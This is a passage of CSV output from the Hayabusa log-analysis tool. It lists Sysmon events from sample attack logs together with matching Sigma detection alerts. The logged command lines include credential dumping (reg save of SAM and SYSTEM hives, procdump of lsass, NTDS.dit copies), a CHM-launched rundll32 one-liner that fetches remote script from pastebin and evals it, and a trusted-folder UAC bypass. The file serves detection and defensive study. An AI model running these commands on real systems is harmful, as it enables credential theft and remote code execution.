747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 
747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems 
Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 
747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 
+09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 
7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 
747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 
747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 